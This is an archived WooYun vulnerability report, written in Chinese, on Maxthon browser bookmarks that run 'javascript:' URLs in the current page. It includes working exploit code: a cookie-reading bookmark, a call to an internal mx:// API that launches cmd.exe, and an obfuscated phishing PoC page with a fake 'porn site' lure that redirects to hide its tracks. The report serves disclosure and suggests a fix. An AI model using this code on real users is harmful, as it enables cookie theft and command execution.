当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110642

漏洞标题:傲游浏览器远程代码执行漏洞/盗取Cookie

相关厂商:傲游

漏洞作者: 数据流

提交时间:2015-04-28 11:01

修复时间:2015-04-28 12:34

公开时间:2015-04-28 12:34

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某处功能设计不当可导致远程代码执行(鸡肋)

详细说明:

发现在傲游浏览器收藏功能处 可直接添加 javascript:伪协议 并且是在当前域打开的

a1.jpg


那么这样就有问题了 要是当前的网页是qq.com,baidu.com什么的

a2.jpg


然后被攻击者再打开收藏处的url就可以执行当前页面域的js了

a3.jpg


而在FireFox的做法是先打开一个about:blank 然后再重定向到收藏地址 这样就避免了这个问题

漏洞证明:

1 盗取cookie
如何让受害者添加收藏夹
傲游浏览器支持external.addFavorite 而在同类的webkit内核的浏览器大多数都是禁止的
执行

external.addFavorite("javascript:alert(document.cookie)","TEST")


会弹出一个框

a4.jpg


这就是鸡肋之一了 但在某些网站的诱惑下还是可以的 例如色情网站的提示收藏
也可以执行了恶意js之后再重定向到一个网址 以增强隐蔽性
例如

external.addFavorite("javascript:alert(document.cookie);location.href=\"http://www.wooyun.org/\"","我是色情网站")

(wooyun反斜杠bug -_-)
2 代码执行
很多人喜欢在添加一个新的Tab然后点书签里的地址
而傲游的new tab是mx://域下的 那做的事情就多了

a5.jpg


在mx://res/notification/ 有个api maxthon.program.Program.launch
可执行命令
直接iframe mx://res/notification/ 就可以调用了

var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function()
{s.contentWindow.maxthon.program.Program.launch("C:/windows/system32/cmd.exe","")};document.body.appendChild(s);


编码一下

String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 105, 102, 114, 97, 109, 101, 34, 41, 59, 115, 46, 115, 114, 99, 61, 34, 109, 120, 58, 47, 47, 114, 101, 115, 47, 110, 111, 116, 105, 102, 105, 99, 97, 116, 105, 111, 110, 47, 34, 59, 115, 46, 111, 110, 108, 111, 97, 100, 61, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 10, 10, 123, 115, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 109, 97, 120, 116, 104, 111, 110, 46, 112, 114, 111, 103, 114, 97, 109, 46, 80, 114, 111, 103, 114, 97, 109, 46, 108, 97, 117, 110, 99, 104, 40, 34, 67, 58, 47, 119, 105, 110, 100, 111, 119, 115, 47, 115, 121, 115, 116, 101, 109, 51, 50, 47, 99, 109, 100, 46, 101, 120, 101, 34, 44, 34, 34, 41, 125, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59)


a6.jpg


成功执行cmd
那么就可以写一个钓鱼性的poc

<script>
function htmldecode(s){
var div = document.createElement('div');
div.innerHTML = s;
return div.innerText || div.textContent;
}
var z = '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#101;&#118;&#97;&#108;&#40;&#83;&#116;&#114;&#105;&#110;&#103;&#46;&#102;&#114;&#111;&#109;&#67;&#104;&#97;&#114;&#67;&#111;&#100;&#101;&#40;&#49;&#49;&#56;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#51;&#50;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#54;&#49;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#49;&#55;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#52;&#54;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#57;&#55;&#44;&#10;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#54;&#57;&#44;&#32;&#49;&#48;&#56;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#52;&#48;&#44;&#32;&#51;&#52;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#48;&#50;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#51;&#52;&#44;&#32;&#52;&#49;&#44;&#32;&#53;&#57;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#54;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#57;&#57;&#44;&#32;&#54;&#49;&#44;&#32;&#51;&#52;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#49;&#50;&#48;&#44;&#32;&#10;&#53;&#56;&#44;&#32;&#52;&#55;&#44;&#32;&#52;&#55;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#55;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#48;&#50;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#57;&#57;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#52;&#55;&#44;&#32;&#51;&#52;&#44;&#32;&#53;&#57;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#54;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#48;&#56;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#57;&#55;&#44;&#32;&#10;&#49;&#48;&#48;&#44;&#32;&#54;&#49;&#44;&#32;&#49;&#48;&#50;&#44;&#32;&#49;&#49;&#55;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#52;&#48;&#44;&#32;&#52;&#49;&#44;&#32;&#49;&#50;&#51;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#54;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#56;&#55;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#57;&#44;&#32;&#10;&#52;&#54;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#50;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#52;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#52;&#54;&#44;&#32;&#49;&#49;&#50;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#48;&#51;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#52;&#54;&#44;&#32;&#56;&#48;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#48;&#51;&#44;&#32;&#49;&#49;&#52;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#52;&#54;&#44;&#32;&#49;&#48;&#56;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#49;&#55;&#44;&#32;&#10;&#49;&#49;&#48;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#48;&#52;&#44;&#32;&#52;&#48;&#44;&#32;&#51;&#52;&#44;&#32;&#54;&#55;&#44;&#32;&#53;&#56;&#44;&#32;&#52;&#55;&#44;&#32;&#49;&#49;&#57;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#49;&#57;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#55;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#49;&#50;&#49;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#53;&#49;&#44;&#32;&#53;&#48;&#44;&#32;&#52;&#55;&#44;&#32;&#57;&#57;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#48;&#56;&#44;&#32;&#57;&#57;&#44;&#32;&#10;&#52;&#54;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#50;&#48;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#51;&#52;&#44;&#32;&#52;&#52;&#44;&#32;&#51;&#52;&#44;&#32;&#51;&#52;&#44;&#32;&#52;&#49;&#44;&#32;&#49;&#50;&#53;&#44;&#32;&#53;&#57;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#57;&#57;&#44;&#32;&#49;&#49;&#55;&#44;&#32;&#49;&#48;&#57;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#49;&#49;&#48;&#44;&#32;&#49;&#49;&#54;&#44;&#32;&#52;&#54;&#44;&#32;&#57;&#56;&#44;&#32;&#49;&#49;&#49;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#49;&#50;&#49;&#44;&#32;&#52;&#54;&#44;&#32;&#57;&#55;&#44;&#32;&#49;&#49;&#50;&#44;&#32;&#49;&#49;&#50;&#44;&#32;&#49;&#48;&#49;&#44;&#32;&#10;&#49;&#49;&#48;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#54;&#55;&#44;&#32;&#49;&#48;&#52;&#44;&#32;&#49;&#48;&#53;&#44;&#32;&#49;&#48;&#56;&#44;&#32;&#49;&#48;&#48;&#44;&#32;&#52;&#48;&#44;&#32;&#49;&#49;&#53;&#44;&#32;&#52;&#49;&#44;&#32;&#53;&#57;&#41;&#41;';
var b = htmldecode(z);
function fuck()
{external.addFavorite(b,"我是色情网站");}
</script>
<a href=# onclick=fuck();>快收藏我 我是色情网站啊</a>


a7.jpg


只要在mx://下点击就能执行命令 例如历史记录

a9.jpg


a10.jpg


在执行完恶意代码后再重定向到一个网站 用户便会认为是一个正常的书签

修复方案:

参考FireFox 当用户打开书签一个网址时 先打开一个空白页 再重定向

版权声明:转载请注明来源 数据流@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-28 12:34

厂商回复:

收藏中 javascript: Chrome等均在当前页面执行

最新状态:

暂无